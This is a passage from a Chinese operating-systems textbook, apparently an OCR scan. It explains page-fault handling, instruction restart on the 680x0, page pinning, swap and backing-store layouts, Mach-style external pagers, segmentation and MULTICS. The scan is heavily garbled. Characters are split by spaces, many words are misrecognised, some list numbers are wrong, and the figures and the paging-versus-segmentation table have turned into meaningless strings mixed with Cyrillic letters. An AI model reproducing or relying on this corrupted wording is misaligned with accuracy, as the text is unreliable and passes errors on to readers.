页 面 是 与 其 他 进程 共享 的 ， 当 最 后 一 个 使 用 它们 的 进程 终止 的 时 候 ， 才 可 以 释放 内 存 和 磁盘 上 的 页 面 。 


3.6.2 缺 页 中 断 处 理 

我 们 终于 可 以 讨论 缺 页 中 断 发 生 的 细节 了 。 缺 页 中 断 发 生 时 的 事件 顺序 如 下 : 

1) 硬件 陷入 内 核 ， 在 堆栈 中 保存 程序 计数 器 。 大 多 数 机 器 将 当前 指令 的 各 种 状态 信息 保存 在 特殊 的 
CPU 寄存 器 中 。 

2) 启动 一 个 汇编 代码 例 程 保存 通用 寄存 器 和 其 他 易 失 的 信息 ， 以 免 被 操作 系统 破坏 。 这 个 例 程 将 操 
作 系 统 作为 一 个 函数 来 调用 。 

3) 当 操 作 系 统 发 现 一 个 缺 页 中 断 时 ， 尝 试 发 现 需 要 哪个 虚拟 页 面 。 通 常 一 个 硬件 寄存 器 包含 了 这 一 
信息 ， 如 果 没 有 的 话 ， 操 作 系统 必须 检索 程序 计数 器 ， 取 出 这 条 指令 ， 用 软件 分 析 这 条 指令 ， 看 看 它 在 
缺 页 中 断 时 正在 做 什么 。 

4) 一 旦 知道 了 发 生 缺 页 中 斯 的 虚拟 地 址 ， 操 作 系统 检查 这 个 地 址 是 否 有 效 ， 并 检查 存 取 与 保护 是 否 
一 致 。 如 果 不 一 致 ， 向 进程 发 出 一 个 信号 或 杀 掉 该 进程 。 如 果 地 址 有 效 且 没有 保护 错误 发 生 ， 系 统 则 检 
查 是 否 有 空闲 页 框 。 如 果 没 有 空闲 页 框 ， 执 行 页 面 置换 算法 寻找 一 个 页 面 来 询 汰 。 

5) 如 果 选 择 的 页 框 “ 脏 ”了 ， 安 排 该 页 写 回 磁盘 ， 并 发 生 一 次 上 下 文 切换 ， 挂 起 产生 缺 页 中 断 的 进 
程 ， 让 其 他 进程 运行 直至 磁盘 传输 结束 。 无 论 如 何 ， 该 页 框 被 标记 为 忙 ， 以 兔 因为 其 他 原因 而 被 其 他 进 
程 占用 。 

6) 一 旦 页 框 “干净 ”后 (无 论 是 立刻 还 是 在 写 回 磁 执 后 ) ， 操 作 系 统 查找 所 需 页 面 在 磁盘 上 的 地 址 ， 
通过 磁盘 操作 将 其 装 和 人。 该 页 面 被 装 和 后， 产生 缺 页 中 断 的 进程 仍然 被 挂 起 ， 并 且 如 果 有 其 他 可 运行 的 
用 户 进 程 ， 则 选择 另 一 个 用 户 进程 运行 。 

D 当 磁 笋 中 断 发 生 时 ， 表 明 该 页 已 经 被 装 和 人 ， 页 表 已 经 更 新 可 以 反映 它 的 位 置 ， 页 框 也 被 标记 为 正 
常 状态 。 

8) 恢复 发 生 缺 页 中 断 指令 以 前 的 状态 ， 程 序 计数 器 重新 指向 这 条 指令 。 
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9) 调度 引发 缺 页 中 断 的 进程 ， 操 作 系统 返回 调用 它 的 汇编 语言 例 程 。 
ТО) 该 例 程 恢复 寄存 器 和 其 他 状态 信息 ， 返 回 到 用 户 空间 继续 执行 ， 就 好 像 缺 页 中 断 没有 发 生 过 一 样 。 


3.6.3 指令 备份 

当 程序 访问 不 在 内 存 中 的 页 面 时 ， 引 起 缺 页 中 上 断 的 指令 会 半途 停止 并 引发 操作 系统 的 陷阱 。 在 操作 
系统 取出 所 需 的 页 面 后 ， 它 需要 重新 启动 引起 陷阱 的 指令 。 但 这 并 不 是 一 件 容易 实现 的 事 。 

我 们 在 最 坏 情形 下 考察 这 个 问题 的 实质 ， 考 虑 一 个 有 双 地 址 指令 的 CPU， 比 如 Motorola 680x0， 这 
是 一 种 在 供 入 式 系统 中 广泛 使 用 的 CPU。 例如， 指令 MOVE.L #6(A1), 2(A0) 


MOVE.L#6(A1), 2(A0) 16 位 


为 6 字 节 〈 见 图 3-28)。 为 了 重启 该 指令 ， 操 作 系统 要 知道 该 о е jara 
指令 第 一 个 字 记 的 位 置 。 在 陷阱 发 生 时 ， 程 序 计数 器 的 值 依 1002 | 一 6 Ta af 
赖 于 引起 缺 页 中 断 的 那个 操作 数 以 及 CPU 中 微 指令 的 实现 广 e а т. 
式 。 9 一 

在 图 3-28 中 ， 从 地 址 1000 处 开始 的 指令 进行 了 3 次 内 存 访 。 图 3-28 引起 缺 页 中 断 的 一 条 指令 
P: 指令 字 本 身 和 操作 数 的 2 个 偏 移 量 。 从 可 以 产生 缺 页 中 上 的 这 3 次 内 存 访问 来 看 ， 程 序 计数 器 可 能 在 
1000、1002 和 1004 时 发 生 缺 页 中 断 ， 对 操作 系统 来 说 要 准确 地 判断 指令 是 从 哪儿 开始 的 通常 是 不 可 能 的 。 
如 果 发 生 缺 页 中 断 时 程序 计数 器 是 1002， 操 作 系统 无 法 弄 清 在 1002 位 置 的 字 是 与 1000 的 指令 有 关 的 内 存 
地 址 (比如 ， 一 个 操作 数 的 位 置 )， 还 是 一 个 指令 的 操作 码 。 

这 种 情况 已 经 很 梢 楼 了 ， 但 可 能 还 有 更 精 的 情况 。 一 些 680x0 体 系 结构 的 寻 址 方式 采用 自动 增 是， 
这 也 意味 着 执行 这 条 指令 的 副作用 是 会 增 量 一 个 或 多 个 寄存 器 。 使 用 自动 增 量 模式 也 可 能 引起 错误 。 这 
依赖 于 微 指令 的 具体 实现 ， 这 种 增 量 可 能 会 在 内 存 访问 之 前 完成 ， 此 时 操作 系统 必须 在 重启 这 条 指令 前 
将 软件 中 的 寄存 器 碱 量 。 自 动 增 量 也 可 能 在 内 存 访问 之 后 完成 ， 此 时 ， 它 不 会 在 陷 人 时 完成 而 且 不 必 由 
操作 系统 恢复 。 自 动 减 量 也 会 出 现 相同 的 问题 。 自 动 增 基 和 自动 减 量 是 否 在 相应 访 存 之 前 完成 随 着 指令 
和 CPU 模式 的 不 同 而 不 同 。 

幸运 的 是 ， 在 基 些 计算 机 上 ，CPU 的 设计 者 们 提供 了 ~- 种 解决 方法 ， 就 是 通过 使 用 -个 隐藏 的 内 部 
寄存 器 。 在 每 条 指令 执行 之 前 ， 把 程序 计数 器 的 内 容 复制 到 该 寄存 器 。 这 些 机 器 可 能 会 有 第 二 个 寄存 器 ， 
用 来 提供 哪些 寄存 器 已 经 自动 增加 或 者 自动 减少 以 及 增 减 的 数量 等 信息 。 通 过 这 些 信息 ， 操 作 系统 可 以 
消除 引起 缺 页 中 断 的 指令 所 造成 的 所 有 影响 ， 并 使 指令 可 以 重新 开始 执行 。 如 果 该 信息 不 可 用 ， 那 么 操 
作 系统 就 要 找 出 所 发 生 的 问题 从 而 设法 来 修复 它 。 看 起 来 硬件 设计 者 是 不 能 解决 这 个 问题 了 ， 于 是 他 们 
就 推 给 操作 系统 的 设计 者 来 解决 这 个 问题 。 


3.6.4 锁定 内 存 中 的 页 面 

尽管 本 章 对 LO 的 讨论 不 多 ， 但 计算 机 有 虚拟 内 存 并 不 意味 着 I/O 不 起 作用 Г. 虚拟 内 存 和 LO 通过 微 
妙 的 方式 相互 作用 着 。 设想 一 个 进程 刚刚 通过 系统 调用 从 文件 或 其 他 设备 中 读 取 数据 到 其 地 址 空间 中 的 
缓冲 区 。 在 等 待 JO 完 成 时 ， 该 进程 被 挂 起 ， 另 一 个 进程 被 允许 运行 ， 而 这 个 进程 产生 一 个 缺 页 中 断 。 

如 果 分 页 算法 是 全 局 算法 ， 包 含 UO 缓 冲 区 的 页 面 会 有 很 小 的 机 会 (但 不 是 没有 ) 被 选中 换 出 内 存 。 
如 果 一 个 1/0 设 备 正 处 在 对 该 页 面 进行 DMA 传 输 的 过 程 之 中 ， 将 这 个 页 面 移出 将 会 导致 部 分 数据 写 人 它 
们 所 属 的 缓冲 区 中 ， 而 部 分 数据 被 写 入 到 最 新 装 入 的 页 面 中 。 一 种 解决 方法 是 锁 住 正在 做 VO 操 作 的 内 
存 中 的 页 面 以 保证 它 不 会 被 移出 内 存 。 锁 住 一 个 页 面 通常 称 为 在 内 存 中 钉 住 (pinning) 页 面 。 另 一 种 方 
法 是 在 内 核 缓 促 区 中 完成 所 有 的 LO 操作 ， 然后 再 将 数据 复制 到 用 户 页 面 。 


3.6.5 后 备 存储 

在 前 面 讨论 过 的 页 面 置换 算法 中 ， 我 们 已 经 知道 了 如 何 选择 换 出 内 存 的 页 面 。 但 是 却 没有 讨论 当 页 
面 被 换 出 时 会 存放 在 磁盘 上 的 哪个 位 置 。 现 在 我 们 讨论 一 下 磁 航 管 理 相关 的 问题 。 

在 磁盘 上 分 配 页 面 空间 的 最 简单 的 算法 是 在 磁盘 上 设置 特殊 的 交换 分 区 ， 甚 至 从 文件 系统 划分 一 块 
独立 的 磁盘 〈 以 平衡 1O 负 载 )。 大 多 数 UNIX 是 这 样 处 理 的 。 在 这 个 分 区 里 没有 普通 的 文件 系统 ， 这 样 
就 消除 了 将 文件 偏 移 转换 成 块 地 址 的 开销 。 取 而 代 之 的 是 ， 始终 使 用 相应 分 区 的 起 始 块 号 。 
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当 系统 启动 时 ， 该 交换 分 区 为 室 ， 并 在 内 存 中 以 单独 的 项 给 出 它 的 起 始 和 大 小 。 在 最 简单 的 情况 下 ， 
当 第 一 个 进程 启动 时 ， 留 出 与 这 个 进程 一 样 大 的 交换 区 块 ， 剩 余 的 为 总 空间 减 去 这 个 交换 分 区 。 当 新 进 
程 启动 后 ， 它 们 同样 被 分 配 与 其 核心 映像 同等 大 小 的 交换 分 区 。 进 程 结束 后 ， 会 释放 其 磁盘 上 的 交换 区 。 
交换 分 区 以 空闲 块 列 表 的 形式 组 织 。 更 好 的 算法 在 第 10 章 里 讨论 。 

与 每 个 进程 对 应 的 是 其 交换 区 的 磁盘 地 址 ， 即 进程 映像 所 保存 的 地 方 。 这 一 信息 是 记录 在 进程 表 里 
的 。 写 回 一 个 页 面 时 ， 计 算 写 回 地 址 的 过 程 很 简单 : 将 虚拟 地 址 空间 中 页 面 的 偏 移 量 加 到 交换 区 的 开始 
地 址 。 但 在 进程 启动 前 必须 初始 化 交换 区 ， 一 种 方法 是 将 整个 进程 映像 复制 到 交换 区 ， 以 便 随时 可 将 所 
需 内 容 装 人 ， 另 一 种 方法 是 将 整个 进程 装 入 内 存 ， 并 在 需要 时 换 出 。 

但 这 种 简单 模式 有 一 个 问题 : 进程 在 启动 后 可 能 增 大 ， 尽 管 程序 正文 通常 是 固定 的 ， 但 数据 有 时 会 
增长 ， 堆 栈 也 总 是 在 随时 增长 。 这 样 ， 最 好 为 正文 、 数 据 和 堆栈 分 别 保留 交换 区 ， 并 且 人 允许 这 些 交换 区 
在 磁盘 上 多 于 一 个 块 。 

另 一 个 极端 的 情况 是 事先 什么 也 不 分 配 ， 在 页 面 换 出 时 为 其 分 配 磁盘 空间 ， 并 在 换 入 时 回收 磁盘 空 
间 ， 这 样 内 存 中 的 进程 不 必 固 定 于 任何 交换 空间 。 其 缺点 是 内 存 中 每 个 页 面 都 要 记录 相应 的 磁盘 地 址 。 
换言之 ， 每 个 进程 都 必须 有 一 张 表 ， 记 录 每 一 个 页 面 在 磁盘 上 的 位 置 。 这 两 个 方案 如 图 3-29 所 示 。 


内 存 磁盘 


13-29 а) 对 静态 交换 区 分 页 ，b) 动态 备份 页 面 


在 图 3-29a 中 ， 有 一 个 带 有 8 个 页 面 的 页 表 。 页 面 0、3、4 和 6 在 内 存 中 。 页 面 1、2、5 和 7 在 磁盘 上 。 
磁盘 上 的 交换 区 与 进程 虚拟 地 址 空间 (8 页 面 ) 一 样 大 ， 每 个 页 面 有 固定 的 位 置 ， 当 它 从 内 存 中 被 淘汰 
时 ， 便 写 到 相应 位 置 。 该 地 址 的 计算 需要 知道 进程 的 分 页 区 域 的 起 始 位 置 ， 因 为 页 面 是 按照 它们 的 虚拟 
页 号 的 顺序 连续 存储 的 。 内 存 中 的 页 面 通常 在 磁盘 上 有 镜像 副本 ， 但 是 如 果 页 面 装 入 后 被 修改 过 ， 那 么 
这 个 副本 就 可 能 是 过 期 的 了 。 内 存 中 的 深 色 页 面 表示 不 在 内 存 ， 磁 盘 上 的 深 色 页 面 (原则 上 ) 被 内 存 中 
的 副本 所 替代 ， 但 如 果 有 一 个 内 存 页 面 要 被 换 回 磁盘 并 且 该 页 面 在 装 和 内存 后 没有 被 修改 过 ， 那 么 将 使 
用 磁盘 中 ( 深 色 ) 的 副本 。 

在 图 3-29b 中 ， 页 面 在 磁盘 上 没有 固定 地 址 。 当 页 面 换 出 时 ， 要 及 时 选择 一 个 空 磁盘 页 面 并 据 此 来 
更 新 磁盘 映射 (每 个 虚拟 页 面 都 有 一 个 磁盘 地 址 空间 )。 内 存 中 的 页 面 在 磁盘 上 没有 副本 。 它 们 在 磁盘 
映射 表 中 的 表 项 包含 一 个 非法 的 磁盘 地 址 或 者 一 个 表示 它们 未 被 使 用 的 标记 位 。 

不 能 保证 总 能 够 实现 固定 的 交换 分 区 。 例 如 ， 没 有 磁盘 分 区 可 用 时 。 在 这 种 情况 下 ， 可 以 利用 正常 
文件 系统 中 的 一 个 或 多 个 较 大 的 、 事 前 定位 的 文件 。Windows 就 使 用 这 个 方法 。 然 而 ， 可 以 利用 优化 方 
法 减少 所 需 的 磁盘 空间 量 。 既 然 每 个 进程 的 程序 正文 来 自 文件 系统 中 某 个 (可 执行 的 ) 文件 ， 这 个 可 执 
行文 件 就 可 用 作 交 换 区 。 而 更 好 的 方法 是 ， 由 于 程序 正文 通常 是 只 读 的 ， 当 内 存 资源 紧张 、 程 序 页 不 得 
不 移出 内 存 时 ， 尽 管 丢弃 它们 ， 在 需要 的 时 候 再 从 可 执行 文件 读 入 即 可 。 共享 库 也 可 以 用 这 个 方式 工作 。 
3.6.6 策略 和 机 制 的 分 离 

控制 系统 复杂 度 的 一 种 重要 方法 就 是 把 策略 从 机 制 中 分 离 出 来 。 通 过 使 大 多 数 存储 管理 器 作为 用 户 
级 进程 运行 ， 就 可 以 把 该 原则 应 用 到 存储 管理 中 。 在 Mach (Young 等 人 ，1987) 中 首先 应 用 了 这 种 分 
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离 。 下 面 的 讨论 基本 上 是 基于 Mach 的 。 

一 个 如 何 分 离 策 略 和 机 制 的 简单 例子 可 以 参见 图 3-30。 其 中 存储 管理 系统 被 分 为 三 个 部 分 ， 

1) 一 个 底层 MMU 处 理 程序 。 内 存 3. 请 求 页 面 

2) 一 个 作为 内 核 一 部 分 的 缺 页 中 
断 处 理 程序 。 

3) 一 个 运行 在 用 户 空间 中 的 外 部 
页 面 调度 程序 。 

所 有 关于 MMU 工 作 的 细节 都 被 封 
装 在 MMU 处 理 程序 中 ， 该 程序 的 代码 
是 与 机 器 相关 的 ， 而 且 操 作 系统 每 应 
用 到 一 个 新 平台 就 要 被 重 写 一 次 。 缺 
页 中 断 处 理 程序 是 与 机 器 无 关 的 代码 
包含 大 多 数 分 页 机 制 。 策 略 主要 由 作 
为 用 户 进程 运行 的 外 部 页 面 调度 程序 
所 决定 。 

当 一 个 进程 启动 时 ， 需 要 通知 外 部 页 面 调度 程序 以 便 建立 进程 页 面 映射 ， 如 果 需 要 的 话 还 要 在 磁盘 
上 分 配 后 备 存储 。 当 进程 正在 运行 时 ， 它 可 能 要 把 新 对 象 映射 到 它 的 地 址 空间 ， 所 以 还 要 再 一 次 通知 外 
部 页 面 调度 程序 。 

一 旦 进程 开始 运行 ， 就 有 可 能 出 现 缺 页 中 断 。 缺 页 中 断 处 理 程序 找 出 需要 哪个 虚拟 页 面 ， 并 发 送 一 
条 消息 给 外 部 页 面 调度 程序 告诉 它 发 生 了 什么 问题 。 外 部 页 面 调度 程序 从 磁盘 中 读 入 所 需 的 页 面 ， 把 它 
复制 到 自己 的 地 址 空间 的 某 一 位 置 。 然 后 告诉 缺 页 中 断 处 理 程序 该 页 面 的 位 置 。 缺 页 中 断 处 理 程序 从 外 
部 页 面 调度 程序 的 地 址 空间 中 清除 该 页 面 的 映射 ， 然 后 请 求 MMU 处 理 程序 把 它 放 到 用 户 地 址 空间 的 正 
确 位 置 ， 随后 就 可 以 重新 启动 用 户 进程 了 。 

这 个 实现 方案 没有 给 出 放置 页 面 置换 算法 的 位 置 。 把 它 放 在 外 部 页 面 调度 程序 中 比较 简单 ， 但 会 有 
一 些 问 题 。 这 里 有 一 条 原则 就 是 外 部 页 面 调度 程序 无 权 访问 所 有 页 面 的 R 位 和 M 位 。 这 些 二 进 制 位 在 许 
多 页 面 置换 算法 起 重要 作用 。 这 样 就 需要 有 某 种 机 制 把 该 信息 传递 给 外 部 页 面 调度 程序 ， 或 者 把 页 面团 
换算 法 放 到 内 核 中 。 在 后 一 种 情况 下 ， 缺 页 中 断 处 理 程序 会 告诉 外 部 页 面 调度 程序 它 所 选择 的 要 淘汰 的 
页 面 并 提供 数据 ， 方 法 是 把 数据 映射 到 外 部 页 面 调度 程序 的 地 址 空间 中 或 者 把 它 包含 到 一 条 消息 中 。 两 
种 方法 中 ， 外 部 页 面 调度 程序 都 把 数据 写 到 磁盘 上 。 

这 种 实现 的 主要 优势 是 有 更 多 的 模块 化 代码 和 更 好 的 适应 性 。 主 要 缺点 是 由 于 多 次 交叉 “用 户 一 内 
核 ”边界 引起 的 额外 开销 ， 以 及 系统 模块 间 消息 传递 所 造成 的 额外 开销 。 现 在 看 来 ， 这 一 主题 有 很 多 争 
议 ， 但 是 随 着 计算 机 越 来 越 快 ， 软 件 越 来 越 复杂 ， 从 长 远 来 看 ， 对 于 大 多 数 实现 ， 为 了 获得 更 高 的 可 千 
性 而 牺 性 一 些 性 能 也 是 可 以 接受 的 。 


3.7 分 段 

到 目前 为 止 我 们 讨论 的 虚拟 内 存 都 是 一 维 的 ， 虚 拟 地 址 从 0 到 最 大 地 址 ， 一 个 地 址 接着 另 一 个 地 址 。 
对 许多 问题 来 说 ， 有 两 个 或 多 个 独立 的 地 址 空间 可 能 比 只 有 一 个 要 好 得 多 。 比 如 ， 一 个 编译 器 在 编译 过 
程 中 会 建立 许多 表 ， 其 中 可 能 包括 : 

1) 被 保存 起 来 供 打 印 清单 用 的 源 程序 正文 用 于 批 处 理 系统 )。 

2) 符号 表 ， 包 含 变量 的 名 字 和 属性 。 

D 包含 用 到 的 所 有 整 型 量 和 浮 点 常量 的 表 。 

4) 语法 分 析 树 ， 包 含 程序 语法 分 析 的 结果 。 

5) 编译 器 内 部 过 程 调用 使 用 的 堆栈 。 

前 4 个 表 随 着 编译 的 进行 不 断 地 增长 ， 最 后 一 个 表 在 编译 过 程 中 以 一 种 不 可 预计 的 方式 增长 和 缩小 。 
在 一 维 存储 器 中 ， 这 5 个 表 只 能 被 分 配 到 虚拟 地 址 空间 中 连续 的 块 中 ， 如 图 3-31 所 示 。 


图 3-30 用 一 个 外 部 页 面 调度 程序 来 处 理 缺 页 中 断 
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考虑 一 下 如 果 一 个 程序 有 非常 多 的 变量 ， 但 是 其 他 部 分 部 是 正常 数量 时 会 发 生 什么 事情 。 地 址 空间 
中 分 给 符号 表 的 块 可 能 会 被 装 满 ， 但 这 时 其 他 表 中 还 有 ， 让 和 地址 空间 
大 基 的 空间 。 编 译 器 当然 可 以 简单 地 打印 出 一 条 信息 说 | 
由 于 变量 太 多 编译 不 能 继续 进行 ， 但 在 其 他 表 中 还 有 空 
间 时 这 样 做 似乎 并 不 恰当。 


另外 一 种 可 能 的 方法 就 是 扮演 侠 浴 罗宾汉 ， 从 拥有 А 
过 量 空间 的 表 中 拿 出 一 些 空间 给 拥有 极 少量 空间 的 表 。 eat | еер 
这 种 处 理 是 可 以 做 到 的 ， 但 是 它 和 管理 自己 的 覆盖 一 样 ， 的 空间 
在 最 好 的 情况 下 是 一 件 令 人 讨厌 的 事 ， 而 最 坏 的 情况 则 
是 一 大 堆 音调 且 没有 任何 回报 的 工作 。 

我 们 真正 需要 的 是 一 个 能 够 把 程序 员 从 管理 表 的 扩 
张 和 收 缩 的 工作 中 解放 出 来 的 办 法 ， 就 像 虚拟 内 存 使 各 
序 员 不 用 再 为 怎样 把 程序 划分 成 覆盖 块 担心 一 样 。 

一 个 直观 并 且 通用 的 方法 是 在 机 器 上 提供 多 个 互相 全 
独立 的 称 为 段 (segment) 的 地 址 空间 。 每 个 段 由 一 个 从 ; |) FEX% 
0 到 最 大 的 线性 地 址 序列 构成 。 各 个 的 长 度 可 以 是 0 到 。 图 3 31 在 _ 维 地 址 空间 中 ， 当 有 多 个 动态 
某 个 允许 的 最 大 值 之 问 的 任何 一 个 值 。 不 同 的 段 的 长 度 од етс асв 
可 以 不 同 ， 并 且 通常 情况 下 也 都 不 相同 。 段 的 长 度 在 运 = ; 
行 期 间 可 以 动态 改变 ， 比 如 ， 准 栈 段 的 长 度 在 数据 被 压 和 时 会 增长 ， 在 数据 被 弹出 时 又 会 碱 小 。 


因为 每 个 段 都 构成 了 一 个 独立 的 地 址 空间 , 所 以 它们 可 以 独立 地 增长 或 减 小 而 不 会 影响 到 其 他 的 段 。 
如 果 一 个 在 某 个 段 中 的 堆栈 需要 更 多 的 空间 ， 它 就 可 以 立刻 得 到 所 需要 的 空间 ， 因 为 它 的 地 址 空间 中 没 
有 任何 其 他 东西 阻挡 它 增 长 。 段 当然 有 可 能 会 被 装 满 ， 但 通常 情况 下 段 都 很 大 ， 因 此 这 种 情况 发 生 的 可 
能 性 很 小 。 要 在 这 种 分 段 或 二 维 的 存储 器 中 指示 一 个 地 址 ， 程 序 必须 提供 两 部 分 地 址 ， 一 个 段 号 和 一 个 
段 内 地 址 。 图 3-32 给 出 了 前 面 讨论 过 的 编译 表 的 分 段 内 存 ， 其 中 共有 5 个 独立 的 段 。 


20K 


16k} 16K 
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| ah 正文 | ж акр 堆栈 
| 
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图 3-32 分 段 存储 管理 ， 每 一 个 段 都 可 以 独立 地 增 大 或 减 小 而 不 会 影响 其 他 的 段 


需要 强调 的 是 ， 段 是 一 个 逻辑 实体 ， 程 序 员 知道 这 一 点 并 把 它 作为 一 个 逻辑 实体 来 使 用 。 一 个 段 可 
能 包括 一 个 过 程 、 一 个 数组 、 一 个 堆栈 、 一 组 数值 变量 ， 但 一 般 它 不 会 同时 包含 多 种 不 同类 型 的 内 容 。 

除了 能 简化 对 长 度 经 常 变动 的 数据 结构 的 管理 之 外 ， 分 段 存储 管理 还 有 其 他 一 些 优点 。 如 果 每 个 过 
程 都 位 于 一 个 独立 的 段 中 并 且 起 始 地 址 是 0， 那 么 把 单独 编译 好 的 过 程 链接 起 来 的 操作 就 可 以 得 到 很 大 
的 简化 。 当 组 成 一 个 程序 的 所 有 过 程 都 被 编译 和 链接 好 以 后 ， 一 个 对 段 4 中 过 程 的 调用 将 使 用 由 两 个 部 
分 组 成 的 地 址 (n, 0) 来 寻 址 到 字 0 (入 口 点 )。 

如 果 随 后 位 于 段 "的 过 程 被 修改 并 被 重新 编译 ， 即 使 新 版 本 的 程序 比 老 的 要 大 ， 也 不 需要 对 其 他 的 
过 程 进行 修改 (因为 没有 修改 它们 的 起 始 地 址 )。 在 一 维 地 址 中 ， 过 程 被 一 个 挨 一 个 紧 紧 地 才 在 一 起 ， 
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中 间 没有 空隙 ， 因 此 修改 一 个 过 程 的 大 小 会 影响 其 他 无 关 的 过 程 的 起 始 地 址 ， 而 这 又 需要 修改 调用 了 这 
些 被 移动 过 的 过 程 的 所 有 过 程 ， 以 使 它们 的 访问 指向 这 些 过 程 的 新 地 址 。 在 一 个 有 数 百 个 过 程 的 程序 中 ， 
这 个 操作 的 开销 可 能 是 相当 大 的 。 

分 段 也 有 助 于 在 儿 个 进程 之 间 共 享 过 程 和 数据 。 这 方面 一 个 常见 的 例子 就 是 共享 库 (shared library), 
运行 高 级 窗口 系统 的 现代 工作 站 经 常 要 把 非常 大 的 图 形 库 编译 进 几乎 所 有 的 程序 中 。 在 分 段 系统 中 ， 可 以 
把 图 形 库 放 到 一 个 单独 的 段 中 由 各 个 进程 共享 ， 从 而 不 再 需要 在 每 个 进程 的 地 址 空间 中 都 保存 一 份 。 虽 然 
在 纯 的 分 页 系统 中 也 可 以 有 共享 库 ， 但 是 它 要 复杂 得 多 ， 并 且 这 些 系 统 实际 上 是 通过 模拟 分 段 来 实现 的 

因为 每 个 段 是 一 个 为 程序 员 所 知道 的 逻辑 实体 ， 比 如 一 个 过 程 、 一 个 数组 或 一 个 堆栈 ， 故 不 同 的 自 
可 以 有 不 同 种 类 的 保护 。 一 个 过 程 段 可 以 被 指明 为 只 允许 执行 ， 从 而 禁止 对 它 的 读 出 和 写 入 ， 一 个 浮 点 
数组 可 以 被 指明 为 允许 读 写 但 不 允许 执行 ， 任 何 试图 向 这 个 段 内 的 跳 转 都 将 被 截获 。 这 样 的 保护 有 助 于 
找到 编程 错误 。 

读者 应 该 试 着 理解 为 什么 保护 在 分 段 存储 中 有 意义 ， 而 在 一 维 的 分 页 存储 中 则 没有 。 在 分 段 存储 中 
用 户 知道 每 个 段 中 包含 了 什么 。 例 如 ， 一 般 来 说 ， 一 个 段 中 不 会 既 包 含 一 个 过 程 又 包含 一 个 堆栈 ， 而 是 
只 会 包含 其 中 的 一 个 。 正 是 因为 每 个 段 只 包含 了 一 种 类 型 的 对 象 ， 所 以 这 个 段 就 可 以 设置 针对 这 种 特定 
类 型 的 合适 的 保护 。 图 3-33 对 分 段 和 分 页 进行 了 比较 。 


考查 点 分 页 эй 
要 程序 员 了 解 正在 使 用 这 种 技 
йн гт 这 = 是 
存在 多 少 线性 地 址 空间 ? 1 许多 
整个 地 址 空间 可 以 超出 物理 存储 器 
的 大 小 外? 是 是 
| иектин ууу ин | A а 
ун # 是 
ЭКИМ Рун аата БЕД? 否 是 
H| 
E Г # 是 
назан 为 了 得 到 大 的 | 为 了 使 程序 和 数据 


线性 地 址 空间 而 | 可 以 被 划分 为 逻辑 上 
不 必 购 买 更 大 的 | 独立 的 地 址 空间 并 且 
物理 存储 器 有 助 于 共享 和 保护 


图 3-33 分 页 与 分 段 的 比较 


页 面 的 内 容 在 某 种 程度 上 是 随机 的 ， 程 序 员 甚至 察觉 不 到 分 页 的 事实 。 尽 管 在 页 表 的 每 个 表 项 中 放 
入 几 位 就 可 以 说 明 其 对 应 页 面 的 访问 权限 ， 然 而 为 了 利用 这 一 点 ， 程 序 员 必须 跟踪 他 的 地 址 空间 中 页 面 
的 界限 。 当 初 正 是 为 了 避免 这 一 类 管理 工作 ， 人 们 才 发 明了 分 页 系统 。 在 分 段 系统 中 ， 由 于 用 户 会 认为 
所 有 的 段 都 一 直 在 内 存 中 ， 也 就 是 说 他 可 以 当 作 所 有 这 些 段 都 在 内 存 中 那样 去 访问 ， 他 可 以 分 别 保护 各 
个 段 ， 所 以 不 需要 关心 覆盖 它们 的 管理 工作 。 
371 纯 分 段 的 实现 

分 段 和 分 页 的 实现 本 质 上 是 不 同 的 : 页 面 是 定 长 的 而 段 不 是 。 图 3-34a 所 示 的 物理 内 存在 初始 时 包 
含 了 5 个 段 。 现 在 让 我 们 考虑 当 段 1 被 淘汰 后 ， 比 它 小 的 段 7 放 进 它 的 位 置 时 会 发 生 f [ 么 样 的 情况 。 这 时 
的 内 存 配置 如 图 3-34b 所 示 ， 在 段 7 与 段 2 之 间 是 一 个 未 用 区 域 ， 即 一 个 空闲 区 。 随后 段 4 被 段 5 代 赫 ， 如 
图 3-34c 所 示 ， 段 3 被 段 6 代替 ， 如 图 3-34d 所 示 。 在 系统 运行 一 段 时 间 后 内 存 被 划分 为 许多 块 ， 一 些 块 包 
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RRR, АЕ ТС, RRRA ARIKA (external fragmentation)。 空 闲 区 的 
存在 使 内 存 被 浪费 了 ， 而 这 可 以 通过 内 存 紧缩 来 解决 。 如 图 3-34c 所 示 。 


段 4 
(7K) 


йз 
(8K) 


段 1 
(ёк) 


0 


в 
(ак) 
а 


图 3-34 a)-d) 棋 盘 形 碎片 的 形成 ，e) 通 过 紧缩 消除 棋盘 形 碎片 


372 分 段 和 分 页 结合 : MULTICS 
如 果 一 个 段 比较 大 ， 把 它 整个 保存 在 内 存 中 可 能 很 不 方便 甚至 是 不 可 能 的 ， 因 此 产生 了 对 它 进 行 分 


页 的 想法 。 这 样 ， 只 有 那些 真正 需要 的 

页 面 才 会 被 调 入 内 存 。 有 几 个 著名 的 系 6 l 

统 实现 了 对 段 进行 分 页 的 支持 ， 在 本 节 [ 1 TEET 

我 们 将 介绍 第 一 个 实现 了 这 种 支持 的 系 于 [页 | 

统一 MULTICS。 在 下 一 节 我 们 将 介 ТЕТЕ ШТП 

绍 一 个 更 新 的 例子 一 一 ntel Pentium, ТЫШ] BONA 
MULTICS 运 行 在 Honeywell 6000 计 算 段 4 描述 符 

机 和 它 的 一 些 后 继 机 型 上 。 它 为 每 个 程序 ГЕТЕ 1 

提供 了 最 多 2" 个 段 (超过 250 0000), 每 段 2 描述 符 ji 7 

ИВЕ ДЕ Е 065 5364 (36 | Ед 页 面 ? 表 项 

位 ) 字 长 。 为 了 实现 它 ，MULTICS 的 设 ГЕ LEESI 

计 者 决定 把 每 个 段 都 看 作 是 一 个 虚拟 内 存 ШО KERA 

并 对 它 进行 分 页 ， 以 结合 分 页 的 优点 ( 统 кийи 

一 的 页 面 大 小 和 在 只 使 用 段 的 一 部 分 时 不 А 

用 把 它 全 部 调 入 内存 ) 和 分 段 的 优点 ( 易 

于 编程、 模块 化 、 保 护 和 共享 )。 в ina aias 
每 个 MULTICS 程 序 都 有 一 个 段 表 ， 下 的 主 存储 吕 地 址 [ашт 

每 个 段 对 应 一 个 描述 符 。 因 为 段 表 可 能 хы TT 

会 有 大 于 25 万 个 的 表 项 ， 段 表 本 身 也 是 一 | 

一 个 段 并 被 分 页 。 一 个 段 描述 符 包含 了 = 

一 个 段 是 否 在 内 存 中 的 标志 ， 只 要 一 个 [жср - 

段 的 任何 一 部 分 在 内 存 中 这 个 段 就 被 认 其 他 位 - | 


为 是 在 内 存 中 ， 并 且 它 的 页 表 也 会 在 内 
